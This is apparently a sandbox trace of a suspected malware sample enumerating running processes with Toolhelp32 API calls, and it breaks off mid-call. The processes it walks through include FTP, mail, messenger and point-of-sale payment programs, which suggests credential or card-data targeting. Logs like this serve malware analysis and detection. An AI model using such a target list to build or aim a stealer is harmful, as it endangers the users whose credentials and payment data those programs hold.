Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0099.385] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0099.385] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0099.386] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0099.386] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0099.387] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0099.387] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0099.388] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0099.388] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0099.389] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0099.389] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0099.390] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.390] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.391] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.391] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.392] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.392] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.393] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.432] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.432] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.433] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.433] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.434] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.434] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.435] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.435] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.436] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.437] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.438] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.439] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.440] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.443] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.444] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.445] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.446] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.447] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.448] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.449] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.449] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.450] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.451] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.452] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.453] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.454] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.455] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.507] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.508] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.509] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.510] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.511] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.511] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.512] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.513] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="kay.exe")) returned 1 [0099.514] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos_pulse_angry.exe")) returned 1 [0099.515] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="surelycakemechanisms.exe")) returned 1 [0099.516] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="renometric.exe")) returned 1 [0099.516] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.517] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.518] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.553] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="osk.exe")) returned 1 [0099.553] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="mshta.exe")) returned 1 [0099.554] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0099.555] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.555] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0099.556] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0099.557] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.558] Process32Next (in: hSnapshot=0x184, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0099.558] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.558] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.558] GlobalUnlock (hMem=0x450004) returned 0 [0099.558] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.558] GlobalLock (hMem=0x45000c) returned 0x56f100 [0099.558] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.558] GlobalUnlock (hMem=0x450004) returned 0 [0099.559] GlobalHandle (pMem=0x56f100) returned 0x45000c [0099.559] GlobalUnlock (hMem=0x45000c) returned 0 [0099.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188 [0099.563] Process32First (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.563] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.564] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.564] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.568] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.568] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.569] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.569] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.570] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.570] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.571] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.571] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.572] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.572] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.573] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.574] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.574] Process32Next (in: hSnapshot=0x188, lppe=0x18fcbc 